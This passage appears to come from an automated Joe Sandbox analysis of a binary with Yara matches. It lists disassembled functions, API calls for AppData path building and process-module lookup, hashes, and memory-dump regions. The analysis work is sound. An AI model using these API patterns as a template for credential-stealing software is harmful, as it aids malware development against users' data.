                        • Opcode Fuzzy Hash: 1a818784cc110defeacea478c0fb537210812ed055bc3917821c15192821f429
                        • Instruction Fuzzy Hash: 10F0B437F000210F8314743E8D8449FB94756E53A033AD72AE91AEF359EC78EC8295D9
                        APIs
                          • Part of subcall function 0046781C: __mtinitlocknum.LIBCMT ref: 00467832
                          • Part of subcall function 0046781C: __amsg_exit.LIBCMT ref: 0046783E
                        • ___addlocaleref.LIBCMT ref: 00468756
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                        • String ID: KERNEL32.DLL$XuG$xtG
                        • API String ID: 3105635775-3157005367
                        • Opcode ID: d77a5d5aea37971aab5de6ffaa4eece88f5f43722847da804f9e9a20b66aaebd
                        • Instruction ID: 348017da31d84f16653ffc5bebcf0de2fc12f5e443ca5948a62c769184bb80cb
                        • Opcode Fuzzy Hash: d77a5d5aea37971aab5de6ffaa4eece88f5f43722847da804f9e9a20b66aaebd
                        • Instruction Fuzzy Hash: 8601C471444700EAD720AF7AD80974ABBE0AF10319F208A1FE4D9576A1DBB8A944CB1E
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045E544
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E573
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E581
                        • lstrcat.KERNEL32(?,0158D8F0), ref: 0045E59C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 43f23539766d29037e4c1468459bd70e8bc9e45550a444691b997b82f9ad0786
                        • Instruction ID: abf364d76ee78364275752a9fbf347c911aaba4115fa894713e455381dc3d6b4
                        • Opcode Fuzzy Hash: 43f23539766d29037e4c1468459bd70e8bc9e45550a444691b997b82f9ad0786
                        • Instruction Fuzzy Hash: FC51E571A5010CAFD759EB65DC86EFE37B9EB48300F40049EB90997341EE74AF848BA5
                        APIs
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00461FDF, 00461FF5, 004620B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen
                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 39653677-4138519520
                        • Opcode ID: 07e231bc2d6b265a2b857a17362cc9f583d7c16d8d36203c8a74c4fa9ed7b531
                        • Instruction ID: b29c37b594a33b49ac455c134b53f6aa08d079de10a74a254fe5698bcbf2e883
                        • Opcode Fuzzy Hash: 07e231bc2d6b265a2b857a17362cc9f583d7c16d8d36203c8a74c4fa9ed7b531
                        • Instruction Fuzzy Hash: 28214839510589AACB20EA35C5447EEF3A6DF80361F848057CA181B342F3BA090AD79F
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045EBB4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EBE3
                        • lstrcat.KERNEL32(?,00000000), ref: 0045EBF1
                        • lstrcat.KERNEL32(?,0158E3E8), ref: 0045EC0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 4afedb47898ed233d1a5ac308b5961141946c41380e41ce50e254c7399a25a2b
                        • Instruction ID: 2803d971ac3b47818fa8a9b070493c62053cf2d929ad4edcceae663f468fdeea
                        • Opcode Fuzzy Hash: 4afedb47898ed233d1a5ac308b5961141946c41380e41ce50e254c7399a25a2b
                        • Instruction Fuzzy Hash: 5831D971A10118ABDB15EF65DD45BEE73B4AF48300F5004ADBE0AA7341DE74AF848BA4
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000), ref: 00464492
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004644AD
                        • CloseHandle.KERNEL32(00000000), ref: 004644B4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004644E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                        • String ID:
                        • API String ID: 4028989146-0
                        • Opcode ID: 94b90d438ceae494a9eea31ea0e9560bcd7f40f34f19456404a84018631cbb78
                        • Instruction ID: 900abba0429f182c073aea28cdc7e7c5fd4ef74e01cf26b0f5af9975e5481143
                        • Opcode Fuzzy Hash: 94b90d438ceae494a9eea31ea0e9560bcd7f40f34f19456404a84018631cbb78
                        • Instruction Fuzzy Hash: 43F0FCF09016152FEB209B749D4DBE776A9AF55304F0005A6FA49D7280EFB88DC0C7A5
                        APIs
                        • __getptd.LIBCMT ref: 00468FDD
                          • Part of subcall function 004687FF: __amsg_exit.LIBCMT ref: 0046880F
                        • __getptd.LIBCMT ref: 00468FF4
                        • __amsg_exit.LIBCMT ref: 00469002
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00469026
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 95a3d415f98c9a59f2fc1650583e062912d927b18c22c1b4cf1e858a97302cd1
                        • Instruction ID: 6e7052197d6cbdcf071f23cff35724878dbb770651663b67958fa39099fd8642
                        • Opcode Fuzzy Hash: 95a3d415f98c9a59f2fc1650583e062912d927b18c22c1b4cf1e858a97302cd1
                        • Instruction Fuzzy Hash: 35F06D329487109ADB60BB7A980675A23A16F0072DF24421FF444AB2D2FFBC5D40DA5F
                        APIs
                        • lstrlen.KERNEL32(------,00445BEB), ref: 0046731B
                        • lstrcpy.KERNEL32(00000000), ref: 0046733F
                        • lstrcat.KERNEL32(?,------), ref: 00467349
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: ------
                        • API String ID: 3050337572-882505780
                        • Opcode ID: 6daaa8f5e4925a585e44cb5c79cfc3ade731ffb29ee7878b3a5e30f786bc9e5c
                        • Instruction ID: 7eeebcf67b9faff739f2d2706d223a12db35603d818a376a42ff3049d837b424
                        • Opcode Fuzzy Hash: 6daaa8f5e4925a585e44cb5c79cfc3ade731ffb29ee7878b3a5e30f786bc9e5c
                        • Instruction Fuzzy Hash: B7F030745103029FDB289F75D848927B6F9EF44704318982EAC9AC3314EB34D880CF20
                        APIs
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453422
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045344B
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453471
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 7e7c32339757328bfef82a78b00ab1763163b991235dcbf7c20812dabf071d4a
                        • Instruction ID: 5eed9d1be016b0ffc752e8fe0c65161fadd9f4ebc1b21a627b4cc433710cde3b
                        • Opcode Fuzzy Hash: 7e7c32339757328bfef82a78b00ab1763163b991235dcbf7c20812dabf071d4a
                        • Instruction Fuzzy Hash: F8123E70A012019FDB28CF19C554B26B7E1BF4535AB19C1AEE809CB3A2D776DD46CB48
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457C94
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457CAF
                          • Part of subcall function 00457D40: std::_Xinvalid_argument.LIBCPMT ref: 00457D58
                          • Part of subcall function 00457D40: std::_Xinvalid_argument.LIBCPMT ref: 00457D76
                          • Part of subcall function 00457D40: std::_Xinvalid_argument.LIBCPMT ref: 00457D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_
                        • String ID: string too long
                        • API String ID: 909987262-2556327735
                        • Opcode ID: f85afead9eccffc6280cc17961e3b67796b57a430f93228212b3c6db0f8b2b61
                        • Instruction ID: 4f1c8bf26af320eca7edf5a6f050ae7f945bfa744139a7df08963b5eb9491094
                        • Opcode Fuzzy Hash: f85afead9eccffc6280cc17961e3b67796b57a430f93228212b3c6db0f8b2b61
                        • Instruction Fuzzy Hash: CC3116723082004BE721DD6CF88096BF3E9EF92752B20453BF9428B742D7759C4983AD
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00446F74
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00446F7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID: @
                        • API String ID: 1357844191-2766056989
                        • Opcode ID: c13daa9b67c36f3690c0128e45cd6ebd32e08e913cf158a9d275d8a6f942887c
                        • Instruction ID: 112aa1b811bd19957548516ed96ca5e893437823b1266f981fc7f3ec3bd00207
                        • Opcode Fuzzy Hash: c13daa9b67c36f3690c0128e45cd6ebd32e08e913cf158a9d275d8a6f942887c
                        • Instruction Fuzzy Hash: 9D2181B06006019BFB248F24DC80BB773E8FB45704F44486DF986CB684E779E949C755
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 004615A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 004615D9
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461611
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461649
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 4f5829bb21b973d403e9c97d0fab5e4c6f0f6e4751fe2f23335769faca504cab
                        • Instruction ID: fce30a79a16579a541b701140738e6608f94203a8d0616010ba37096353c3c9a
                        • Opcode Fuzzy Hash: 4f5829bb21b973d403e9c97d0fab5e4c6f0f6e4751fe2f23335769faca504cab
                        • Instruction Fuzzy Hash: 26210AB4601B029BD724DF3AD954A17F7F5AF44700B48491EA887C7B50EB78E841CBA9
                        APIs
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000), ref: 0044162D
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000,?), ref: 0044164F
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000,?), ref: 00441671
                          • Part of subcall function 00441610: lstrcpy.KERNEL32(00000000,?), ref: 00441693
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441557
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441579
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                        • lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 7bbc27fa2e376f02077ef0d64837021bc3843cc066dc9ede4e67802d8beb8bb2
